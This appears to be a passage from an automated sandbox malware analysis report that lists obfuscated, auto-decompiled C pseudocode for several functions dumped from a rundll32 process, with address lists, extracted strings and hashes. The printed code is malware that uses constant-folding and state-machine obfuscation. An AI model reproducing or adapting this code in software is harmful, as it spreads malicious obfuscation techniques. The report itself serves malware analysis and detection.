				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00B36D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E00B2F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E00B2F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00B31773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E00B2568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E00B229E3( &_v524, 0x104, E00B3889D(0xb3c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00B32025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00B34F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00B28736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E00B2C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E00B2F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E00B3388A();
								_t479 = E00B30ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E00B2B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E00B280BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E00B288E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0xb3c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0xb3ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0xb3ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}

0x00b24a3b
0x00b24a46
0x00b24a51
0x00b24a5c
0x00b24a64
0x00b24a6c
0x00b24a71
0x00b24a79
0x00b24a81
0x00b24a8c
0x00b24a94
0x00b24a9f
0x00b24aaa
0x00b24ab2
0x00b24abd
0x00b24ad3
0x00b24ada
0x00b24ae3
0x00b24aea
0x00b24aef
0x00b24af8
0x00b24b03
0x00b24b0b
0x00b24b13
0x00b24b1b
0x00b24b23
0x00b24b35
0x00b24b3a
0x00b24b43
0x00b24b4e
0x00b24b5a
0x00b24b5d
0x00b24b61
0x00b24b69
0x00b24b71
0x00b24b79
0x00b24b81
0x00b24b85
0x00b24b8d
0x00b24b98
0x00b24ba0
0x00b24bab
0x00b24bb6
0x00b24bc1
0x00b24bcc
0x00b24bd4
0x00b24bdc
0x00b24be4
0x00b24bec
0x00b24bf4
0x00b24bff
0x00b24c0a
0x00b24c15
0x00b24c20
0x00b24c28
0x00b24c33
0x00b24c3e
0x00b24c49
0x00b24c54
0x00b24c67
0x00b24c6e
0x00b24c79
0x00b24c81
0x00b24c89
0x00b24c8e
0x00b24c98
0x00b24ca8
0x00b24cae
0x00b24cb6
0x00b24cbb
0x00b24cc3
0x00b24cce
0x00b24cd9
0x00b24ce4
0x00b24cec
0x00b24cf1
0x00b24cf9
0x00b24d01
0x00b24d09
0x00b24d14
0x00b24d1f
0x00b24d2a
0x00b24d32
0x00b24d37
0x00b24d3f
0x00b24d47
0x00b24d4f
0x00b24d57
0x00b24d5f
0x00b24d67
0x00b24d6f
0x00b24d77
0x00b24d80
0x00b24d85
0x00b24d8b
0x00b24d93
0x00b24d9e
0x00b24da9
0x00b24db4
0x00b24dbc
0x00b24dc4
0x00b24dc9
0x00b24dd1
0x00b24dd9
0x00b24de5
0x00b24de8
0x00b24dec
0x00b24df4
0x00b24dfc
0x00b24e04
0x00b24e09
0x00b24e0e
0x00b24e16
0x00b24e21
0x00b24e29
0x00b24e34
0x00b24e3c
0x00b24e44
0x00b24e49
0x00b24e51
0x00b24e64
0x00b24e6b
0x00b24e76
0x00b24e7e
0x00b24e86
0x00b24e8e
0x00b24e96
0x00b24e9e
0x00b24ea6
0x00b24eae
0x00b24eb6
0x00b24ec1
0x00b24ecc
0x00b24ed7
0x00b24ee4
0x00b24eef
0x00b24efa
0x00b24f02
0x00b24f0a
0x00b24f12
0x00b24f1a
0x00b24f22
0x00b24f27
0x00b24f2c
0x00b24f34
0x00b24f3c
0x00b24f4a
0x00b24f4f
0x00b24f5a
0x00b24f5b
0x00b24f5f
0x00b24f67
0x00b24f72
0x00b24f7d
0x00b24f88
0x00b24f93
0x00b24f9e
0x00b24fa9
0x00b24fb4
0x00b24fbf
0x00b24fca
0x00b24fd7
0x00b24fdb
0x00b24fe3
0x00b24fe8
0x00b24ff0
0x00b24ffb
0x00b25003
0x00b2500e
0x00b25019
0x00b25021
0x00b2502c
0x00b25034
0x00b2503c
0x00b25044
0x00b25049
0x00b25051
0x00b25059
0x00b25063
0x00b25067
0x00b2506f
0x00b25077
0x00b25082
0x00b2508d
0x00b25098
0x00b250a0
0x00b250a5
0x00b250ad
0x00b250b5
0x00b250c0
0x00b250cb
0x00b250d6
0x00b250e1
0x00b250ee
0x00b250f2
0x00b250fa
0x00b25102
0x00b2510a
0x00b25118
0x00b25121
0x00b25125
0x00b2512d
0x00b25135
0x00b2513d
0x00b25142
0x00b25155
0x00b2515a
0x00b25161
0x00b25163
0x00b2516a
0x00b2516a
0x00b2516a
0x00b2516f
0x00b2516f
0x00b2516f
0x00b2516f
0x00b25175
0x00000000
0x00000000
0x00b2517b
0x00000000
0x00b254f8
0x00b25187
0x00b25193
0x00b252e9
0x00b252ef
0x00b252f0
0x00b2516a
0x00b2516a
0x00b2516a
0x00000000
0x00b2516a
0x00b25199
0x00b2519f
0x00b252ad
0x00b252b8
0x00b252bd
0x00b252bf
0x00b252c2
0x00b252c9
0x00b252ce
0x00000000
0x00b251a5
0x00b251ab
0x00b2525c
0x00b2525d
0x00b2526d
0x00b2526f
0x00b25277
0x00b25279
0x00b2527d
0x00b25284
0x00b25285
0x00b2528a
0x00b2528d
0x00b2516a
0x00b2516a
0x00b2516a
0x00000000
0x00b2516a
0x00b251b1
0x00b251b3
0x00b251e0
0x00b2522f
0x00b25234
0x00b2524b
0x00b25251
0x00b25252
0x00b2516a
0x00b2516a
0x00b2516a
0x00000000
0x00b2516a
0x00b251b5
0x00b251bb
0x00000000
0x00b251c1
0x00b251d3
0x00b251d8
0x00b251d9
0x00b2516a
0x00b2516a
0x00b2516a
0x00000000
0x00b2516a
0x00b2516a
0x00b251bb
0x00b251b3
0x00b251ab
0x00b2519f
0x00b253b2
0x00b253b2
0x00b253b2
0x00b2530c
0x00b25310
0x00b25311
0x00b25316
0x00b25319
0x00b2531a
0x00b2531c
0x00b25322
0x00b25323
0x00b25342
0x00b2534a
0x00b2534f
0x00b25352
0x00b2516a
0x00b2516a
0x00b2516a
0x00000000
0x00b2516a
0x00b2516a
0x00000000
0x00b2531c
0x00b2535c
0x00b25362
0x00b254bd
0x00b254c4
0x00b254c9
0x00000000
0x00b25368
0x00b25368
0x00b2536e
0x00b25439
0x00b25440
0x00b25445
0x00b2545c
0x00b25490
0x00b25495
0x00b2549a
0x00b2549c
0x00000000
0x00b25374
0x00b25374
0x00b2537a
0x00b25404
0x00b2540c
0x00b25414
0x00b25415
0x00000000
0x00b2537c
0x00b2537c
0x00b25382
0x00b253c8
0x00b253ce
0x00b253d6
0x00b253d8
0x00b253d9
0x00b253d9
0x00b253df
0x00b253df
0x00b2516a
0x00b2516a
0x00b2516a
0x00000000
0x00b2516a
0x00b25384
0x00b25384
0x00b2538a
0x00b25397
0x00b2539a
0x00b2539f
0x00b253a2
0x00000000
0x00b253a2
0x00000000
0x00b2538a
0x00b25382
0x00b2537a
0x00b2536e
0x00000000
0x00b254ce
0x00b254ce
0x00b254ce
0x00000000
0x00b2516f

Strings

6T-, xrefs: 00B24CD9
U$, xrefs: 00B2502C
e!, xrefs: 00B25102
;x, xrefs: 00B24D93
h=, xrefs: 00B24BAB
*X, xrefs: 00B24B23
-*, xrefs: 00B24FB4
WM, xrefs: 00B24B8D
Kc, xrefs: 00B25051
>], xrefs: 00B24CE4
`+, xrefs: 00B24B4E
][, xrefs: 00B2512D
P, xrefs: 00B24A5C

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
API String ID: 0-2931794159
Opcode ID: 564cea4cc152919d6a716695669bebd50d8cf1aa962936a24d169a319b4dc641
Instruction ID: 1f5ee6acb7418e849b89cc4e8f3f1660b3ddb3269d77ba305f43e2c46b03a8d3
Opcode Fuzzy Hash: 564cea4cc152919d6a716695669bebd50d8cf1aa962936a24d169a319b4dc641
Instruction Fuzzy Hash: 213211715087808FE378CF65D54AA8BBBE1FBC4314F108A1DE5DA962A0DBB59849CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00B28F78, Relevance: 15.4, Strings: 12, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00B28F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E00B2BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00B34F7D(_v552, _v580, _v540);
										E00B34F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00B34F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E00B2F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E00B2F326();
										E00B2F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E00B217AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0xb3c910);
												_t378 = E00B288E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00B34F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E00B2568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00B34F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00B28736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0xb3ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0xb3ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}

0x00b28f78
0x00b28f7e
0x00b28f86
0x00b28f8e
0x00b28f96
0x00b28f9b
0x00b28fa3
0x00b28fab
0x00b28fb3
0x00b28fb8
0x00b28fbd
0x00b28fc5
0x00b28fcd
0x00b28fd5
0x00b28fdd
0x00b28fea
0x00b28ff1
0x00b28ff7
0x00b28ffc
0x00b29001
0x00b29007
0x00b2900f
0x00b29017
0x00b2901f
0x00b29024
0x00b2902c
0x00b29039
0x00b2903c
0x00b29040
0x00b29048
0x00b29050
0x00b2905b
0x00b29066
0x00b29071
0x00b2907c
0x00b29087
0x00b29092
0x00b2909a
0x00b290a2
0x00b290a7
0x00b290af
0x00b290b7
0x00b290bf
0x00b290c7
0x00b290cf
0x00b290df
0x00b290e8
0x00b290eb
0x00b290ef
0x00b290f4
0x00b290fc
0x00b29104
0x00b2910f
0x00b29113
0x00b2911b
0x00b29123
0x00b2912b
0x00b29133
0x00b29138
0x00b29140
0x00b29148
0x00b29156
0x00b2915b
0x00b29161
0x00b29169
0x00b29176
0x00b29179
0x00b2917d
0x00b2918d
0x00b29191
0x00b29199
0x00b291a1
0x00b291a6
0x00b291ae
0x00b291b3
0x00b291bb
0x00b291c8
0x00b291cb
0x00b291cf
0x00b291d7
0x00b291df
0x00b291ea
0x00b291f5
0x00b29200
0x00b2920b
0x00b29213
0x00b2921e
0x00b29226
0x00b29233
0x00b29237
0x00b2923f
0x00b29247
0x00b2924c
0x00b29251
0x00b29259
0x00b29264
0x00b2926f
0x00b2927a
0x00b29285
0x00b2928d
0x00b29298
0x00b292a3
0x00b292ae
0x00b292b9
0x00b292c1
0x00b292c9
0x00b292d1
0x00b292d9
0x00b292e6
0x00b292e7
0x00b292eb
0x00b292f3
0x00b292fb
0x00b29309
0x00b2930d
0x00b29315
0x00b2931d
0x00b29325
0x00b2932d
0x00b29332
0x00b2933a
0x00b29342
0x00b2934a
0x00b29352
0x00b2935a
0x00b29362
0x00b2936a
0x00b29378
0x00b29379
0x00b29380
0x00b29387
0x00b2938b
0x00b29393
0x00b2939b
0x00b293a0
0x00b293a8
0x00b293b0
0x00b293b8
0x00b293c2
0x00b293c6
0x00b293ce
0x00b293d6
0x00b293db
0x00b293e3
0x00b293eb
0x00b293f3
0x00b293fe
0x00b29402
0x00b2940a
0x00b29417
0x00b2941b
0x00b29423
0x00b2942b
0x00b29433
0x00b29433
0x00b29433
0x00b29438
0x00b29438
0x00b29438
0x00b2943d
0x00b2943d
0x00b2943d
0x00b2943d
0x00b2943f
0x00000000
0x00000000
0x00b29445
0x00b2955a
0x00b2955b
0x00b2957f
0x00b29584
0x00b29589
0x00b2959d
0x00b295b5
0x00b295ba
0x00b295bb
0x00b295c2
0x00b295c9
0x00b295d0
0x00b295d0
0x00b295d6
0x00b295d6
0x00b29433
0x00b29433
0x00b29433
0x00000000
0x00b29433
0x00b2944b
0x00b29451
0x00000000
0x00b296c1
0x00b2945d
0x00b2952e
0x00b29535
0x00b29541
0x00b29546
0x00b2954b
0x00000000
0x00b29463
0x00b29469
0x00b294d8
0x00b29511
0x00000000
0x00b294da
0x00b294da
0x00b294e5
0x00b294e7
0x00b294f4
0x00b294f9
0x00b294fe
0x00b29506
0x00b29433
0x00b29433
0x00b29433
0x00b29438
0x00b29438
0x00000000
0x00b29438
0x00b29433
0x00b2946b
0x00b29471
0x00000000
0x00b29477
0x00b29485
0x00b29486
0x00b2948d
0x00b29495
0x00b2949b
0x00b294b0
0x00b294c1
0x00b294c7
0x00b294c7
0x00b294cc
0x00b29438
0x00b29438
0x00b29438
0x00000000
0x00b29438
0x00b2949d
0x00b294a4
0x00b294a9
0x00000000
0x00b294a9
0x00b2949b
0x00b29471
0x00b29469
0x00b2945d
0x00b295ec
0x00b295f2
0x00b295fa
0x00000000
0x00b29600
0x00b29600
0x00b29601
0x00b2960e
0x00b2960f
0x00b2960f
0x00b2961a
0x00b2961b
0x00b29626
0x00b29628
0x00b2962d
0x00b29632
0x00000000
0x00b29634
0x00b29643
0x00b29648
0x00b2964d
0x00b29654
0x00000000
0x00b29654
0x00000000
0x00b29632
0x00b296cc
0x00b296cc
0x00b296cc
0x00b2965d
0x00b29669
0x00b2966a
0x00b2966d
0x00b2966e
0x00b29673
0x00b29679
0x00b2967b
0x00000000
0x00b2967b
0x00000000
0x00b29679
0x00b295e6
0x00b29685
0x00b29688
0x00b2968d
0x00b29692
0x00b29695
0x00b2969a
0x00000000
0x00b2969a
0x00000000
0x00b296a0
0x00b296a0
0x00000000
0x00b2943d
0x00b29438

Strings

fpMl!, xrefs: 00B2960F
s5, xrefs: 00B2921E
`H, xrefs: 00B292FB
]V, xrefs: 00B29050
b{, xrefs: 00B292A3
Ml!, xrefs: 00B294E7
#, xrefs: 00B293CE
G1, xrefs: 00B29362
@C, xrefs: 00B292D9
~\, xrefs: 00B291DF
}a, xrefs: 00B29325
-, xrefs: 00B29342

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
API String ID: 0-964951681
Opcode ID: 3b45675b0dc082436c01866fb9d754b89268aa6ab889062d45425c1734529d93
Instruction ID: 321b9ccf188540ecb03ec4e24d37e0388d6d35343cd236f88eafacc75a1ca1b1
Opcode Fuzzy Hash: 3b45675b0dc082436c01866fb9d754b89268aa6ab889062d45425c1734529d93
Instruction Fuzzy Hash: AA02617150D3818FE368CF25E54AA4BBBE1FBC4708F50891DF1A9862A0D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E377, Relevance: 15.3, Strings: 12, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00B2E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
